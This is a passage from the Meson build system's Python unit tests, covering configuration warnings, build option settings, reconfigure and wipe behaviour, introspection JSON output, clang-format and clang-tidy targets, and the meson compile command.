self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
of = open(mfile, 'w')
of.write("project('foobar', 'c')\n")
of.close()
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['optimization'], '0')
self.setconf('-Doptimization=g')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['optimization'], 'g')
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = '{}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_pkg_config_libdir(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = 'pkg-config'
[properties]
pkg_config_libdir = ['{}']
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
# Set an older version to force a reconfigure from scratch
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1', '-Dsub1:werror=true'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.assertRegex(out, 'sub1:werror True')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.assertRegex(out, 'sub1:werror True')
self.assertTrue(Path(self.builddir, '.gitignore').exists())
self.build()
self.run_tests()
def test_wipe_from_builddir(self):
testdir = os.path.join(self.common_test_dir, '157 custom target subdir depend files')
self.init(testdir)
self.__reconfigure()
with Path(self.builddir):
self.init(testdir, extra_args=['--wipe'])
def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
def test_target_construct_id_from_path(self):
# This id is stable but not guessable.
# The test is supposed to prevent unintentional
# changes of target ID generation.
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '33 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), {'meson.build'})
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '40 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), {'meson_options.txt', 'meson.build'})
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '43 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), {'meson_options.txt', 'meson.build'})
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = {f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files']}
self.assertEqual(subproject_files, {'subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build'})
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
testdir = os.path.join(self.common_test_dir, '98 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': '1.0'
},
{
'descriptive_name': 'sub_implicit',
'name': 'sub_implicit',
'version': '1.0',
},
{
'descriptive_name': 'sub-novar',
'name': 'sub_novar',
'version': '1.0',
},
{
'descriptive_name': 'subsub',
'name': 'subsub',
'version': 'undefined'
},
{
'descriptive_name': 'subsubsub',
'name': 'subsubsub',
'version': 'undefined'
},
]
}
res['subprojects'] = sorted(res['subprojects'], key=lambda i: i['name'])
self.assertDictEqual(expected, res)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '42 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '75 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '75 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest(f'Clang-format is for now only supported on Ninja, not {self.backend.name}')
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest(f'Clang-tidy is for now only supported on Ninja, not {self.backend.name}')
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '69 clang-tidy')
dummydir = os.path.join(testdir, 'dummydir.h')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
self.assertNotIn(dummydir, out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '70 cross')
# Do a build to generate a cross file where the host is this target
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
# XXX: These now generate in a different order, is that okay?
self.assertListEqual(sorted(res_nb, key=lambda x: x['name']), sorted(res_wb, key=lambda x: x['name']))
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_buildoptions_cross_only(self):
testdir = os.path.join(self.unit_test_dir, '83 cross only introspect')
testfile = os.path.join(testdir, 'meson.build')
res = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
optnames = [o['name'] for o in res]
self.assertIn('c_args', optnames)
self.assertNotIn('build.c_args', optnames)
def test_introspect_json_flat(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
out = self.init(testdir, extra_args=['-Dlayout=flat'])
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
with open(os.path.join(infodir, 'intro-targets.json')) as fp:
targets = json.load(fp)
for i in targets:
for out in i['filename']:
assert(os.path.relpath(out, self.builddir).startswith('meson-out'))
def test_introspect_json_dump(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
def assertKeyTypes(key_type_list, obj, strict: bool = True):
for i in key_type_list:
if isinstance(i[1], (list, tuple)) and None in i[1]:
i = (i[0], tuple([x for x in i[1] if x is not None]))
if i[0] not in obj or obj[i[0]] is None:
continue
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
if strict:
for k in obj.keys():
found = False
for i in key_type_list:
if k == i[0]:
found = True
break
self.assertTrue(found, f'Key "{k}" not in expected list')
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
('protocol', str),
('depends', list),
('workdir', (str, None)),
('priority', int),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
('choices', (list, None)),
('value', (str, int, bool, list)),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('version', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('extra_files', list),
('subproject', (str, None)),
('install_filename', (list, None)),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr) as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Match target ids to input and output files for ease of reference
src_to_id = {}
out_to_id = {}
name_to_out = {}
for i in res['targets']:
print(json.dump(i, sys.stdout))
out_to_id.update({os.path.relpath(out, self.builddir): i['id']
for out in i['filename']})
name_to_out.update({i['name']: i['filename']})
for group in i['target_sources']:
src_to_id.update({os.path.relpath(src, testdir): i['id']
for src in group['sources']})
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
deps_to_find = {'test case 1': [src_to_id['t1.cpp']],
'test case 2': [src_to_id['t2.cpp'], src_to_id['t3.cpp']],
'benchmark 1': [out_to_id['file2'], out_to_id['file3'], out_to_id['file4'], src_to_id['t3.cpp']]}
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertEqual(sorted(i['depends']),
sorted(deps_to_find[i['name']]))
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i, strict=False)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build',
[os.path.join(testdir, 'sharedlib', 'shared.cpp')]),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build',
[os.path.join(testdir, 'staticlib', 'static.c')]),
'custom target test 1': ('custom', False, False, 'meson.build',
[os.path.join(testdir, 'cp.py')]),
'custom target test 2': ('custom', False, False, 'meson.build',
name_to_out['custom target test 1']),
'test1': ('executable', True, True, 'meson.build',
[os.path.join(testdir, 't1.cpp')]),
'test2': ('executable', True, False, 'meson.build',
[os.path.join(testdir, 't2.cpp')]),
'test3': ('executable', True, False, 'meson.build',
[os.path.join(testdir, 't3.cpp')]),
'custom target test 3': ('custom', False, False, 'meson.build',
name_to_out['test3']),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertEqual(j['sources'], [os.path.normpath(f) for f in tgt[4]])
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, f'intro-{i}.json')
self.assertPathExists(curr)
with open(curr) as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile) as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile) as fp:
res1 = json.load(fp)
for i in res1:
if i['name'] == 'cpp_std':
i['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
i['value'] = 'c++14'
if i['name'] == 'buildtype':
i['value'] = 'release'
if i['name'] == 'optimization':
i['value'] = '3'
if i['name'] == 'debug':
i['value'] = False
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
with open(introfile) as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile) as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
res_wb = [i for i in res_wb if i['type'] != 'custom']
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_ast_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--ast'] + self.meson_args)
node_counter = {}
def accept_node(json_node):
self.assertIsInstance(json_node, dict)
for i in ['lineno', 'colno', 'end_lineno', 'end_colno']:
self.assertIn(i, json_node)
self.assertIsInstance(json_node[i], int)
self.assertIn('node', json_node)
n = json_node['node']
self.assertIsInstance(n, str)
self.assertIn(n, nodes)
if n not in node_counter:
node_counter[n] = 0
node_counter[n] = node_counter[n] + 1
for nodeDesc in nodes[n]:
key = nodeDesc[0]
func = nodeDesc[1]
self.assertIn(key, json_node)
if func is None:
tp = nodeDesc[2]
self.assertIsInstance(json_node[key], tp)
continue
func(json_node[key])
def accept_node_list(node_list):
self.assertIsInstance(node_list, list)
for i in node_list:
accept_node(i)
def accept_kwargs(kwargs):
self.assertIsInstance(kwargs, list)
for i in kwargs:
self.assertIn('key', i)
self.assertIn('val', i)
accept_node(i['key'])
accept_node(i['val'])
nodes = {
'BooleanNode': [('value', None, bool)],
'IdNode': [('value', None, str)],
'NumberNode': [('value', None, int)],
'StringNode': [('value', None, str)],
'ContinueNode': [],
'BreakNode': [],
'ArgumentNode': [('positional', accept_node_list), ('kwargs', accept_kwargs)],
'ArrayNode': [('args', accept_node)],
'DictNode': [('args', accept_node)],
'EmptyNode': [],
'OrNode': [('left', accept_node), ('right', accept_node)],
'AndNode': [('left', accept_node), ('right', accept_node)],
'ComparisonNode': [('left', accept_node), ('right', accept_node), ('ctype', None, str)],
'ArithmeticNode': [('left', accept_node), ('right', accept_node), ('op', None, str)],
'NotNode': [('right', accept_node)],
'CodeBlockNode': [('lines', accept_node_list)],
'IndexNode': [('object', accept_node), ('index', accept_node)],
'MethodNode': [('object', accept_node), ('args', accept_node), ('name', None, str)],
'FunctionNode': [('args', accept_node), ('name', None, str)],
'AssignmentNode': [('value', accept_node), ('var_name', None, str)],
'PlusAssignmentNode': [('value', accept_node), ('var_name', None, str)],
'ForeachClauseNode': [('items', accept_node), ('block', accept_node), ('varnames', None, list)],
'IfClauseNode': [('ifs', accept_node_list), ('else', accept_node)],
'IfNode': [('condition', accept_node), ('block', accept_node)],
'UMinusNode': [('right', accept_node)],
'TernaryNode': [('condition', accept_node), ('true', accept_node), ('false', accept_node)],
}
accept_node(res_nb)
for n, c in [('ContinueNode', 2), ('BreakNode', 1), ('NotNode', 3)]:
self.assertIn(n, node_counter)
self.assertEqual(node_counter[n], c)
def test_introspect_dependencies_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'version': ['>=1.2.3'],
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'version': ['>=1.0.0', '<=99.9.9'],
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '63 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest(f'Skipping alias_target test with {self.backend.name} backend')
testdir = os.path.join(self.unit_test_dir, '65 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
def test_summary(self):
testdir = os.path.join(self.unit_test_dir, '72 summary')
out = self.init(testdir)
expected = textwrap.dedent(r'''
Some Subproject 2.0
string : bar
integer: 1
boolean: True
My Project 1.0
Configuration
Some boolean : False
Another boolean: True
Some string : Hello World
A list : string
1
True
empty list :
enabled_opt : enabled
A number : 1
yes : YES
no : NO
coma list : a, b, c
Stuff
missing prog : NO
existing prog : ''' + sys.executable + '''
missing dep : NO
internal dep : YES
Plugins
long coma list : alpha, alphacolor, apetag, audiofx, audioparsers, auparse,
autodetect, avi
Subprojects
sub : YES
sub2 : NO Problem encountered: This subproject failed
''')
expected_lines = expected.split('\n')[1:]
out_start = out.find(expected_lines[0])
out_lines = out[out_start:].split('\n')[:len(expected_lines)]
if sys.version_info < (3, 7, 0):
# Dictionary order is not stable in Python <3.7, so sort the lines
# while comparing
self.assertEqual(sorted(expected_lines), sorted(out_lines))
else:
self.assertEqual(expected_lines, out_lines)
def test_meson_compile(self):
"""Test the meson compile command."""
def get_exe_name(basename: str) -> str:
if is_windows():
return f'{basename}.exe'
else:
return basename
def get_shared_lib_name(basename: str) -> str:
if mesonbuild.environment.detect_msys2_arch():
return f'lib{basename}.dll'
elif is_windows():
return f'{basename}.dll'
elif is_cygwin():
return f'cyg{basename}.dll'
elif is_osx():
return f'lib{basename}.dylib'
else:
return f'lib{basename}.so'
def get_static_lib_name(basename: str) -> str:
return f'lib{basename}.a'
# Base case (no targets or additional arguments)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
self._run([*self.meson_command, 'compile', '-C', self.builddir])
self.assertPathExists(os.path.join(self.builddir, get_exe_name('trivialprog')))
# `--clean`
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
# Target specified in a project with unique names
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--wipe'])
# Multiple targets and target type specified
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'mylib', 'mycpplib:shared_library'])
# Check that we have a shared lib, but not an executable, i.e. check that target actually worked
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mylib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('prog')))
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mycpplib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('cppprog')))
# Target specified in a project with non unique names
testdir = os.path.join(self.common_test_dir, '185 same target name')
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir, './foo'])
self.assertPathExists(os.path.join(self.builddir, get_static_lib_name('foo')))
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'sub/foo'])
self.assertPathExists(os.path.join(self.builddir, 'sub', get_static_lib_name('foo')))
# run_target
testdir = os.path.join(self.common_test_dir, '51 run target')
self.init(testdir, extra_args=['--wipe'])
out = self._run([*self.meson_command, 'compile', '-C', self.builddir, 'py3hi'])
self.assertIn('I am Python3.', out)
# `--$BACKEND-args`
testdir = os.path.join(self.common_test_dir, '1 trivial')
if self.backend is Backend.ninja:
self.init(testdir, extra_args=['--wipe'])
# Dry run - should not create a program
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--ninja-args=-n'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
elif self.backend is Backend.vs:
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir])
# Explicitly clean the target through msbuild interface
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--vs-args=-t:{}:Clean'.format(re.sub(r'[\%\$\@\;\.\(\)\']', '_', get_exe_name('trivialprog')))])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
def test_spurious_reconfigure_built_dep_file(self):
testdir = os.path.join(self.unit_test_dir, '74 dep files')
# Regression test: Spurious reconfigure was happening when build
# directory is inside source directory.
# See https://gitlab.freedesktop.org/gstreamer/gst-build/-/issues/85.
srcdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, srcdir)
builddir = os.path.join(srcdir, '_build')
self.change_builddir(builddir)
self.init(srcdir)
self.build()
# During first configure the file did not exist so no dependency should
# have been set. A rebuild should not trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
self.init(srcdir, extra_args=['--reconfigure'])
# During the reconfigure the file did exist, but is inside build
# directory, so no dependency should have been set. A rebuild should not
# trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
def _test_junit(self, case: str) -> None:
try:
import lxml.etree as et
except ImportError:
raise unittest.SkipTest('lxml required, but not found.')
schema = et.XMLSchema(et.parse(str(Path(__file__).parent / 'data' / 'schema.xsd')))
self.init(case)
self.run_tests()
junit = et.parse(str(Path(self.builddir) / 'meson-logs' / 'testlog.junit.xml'))
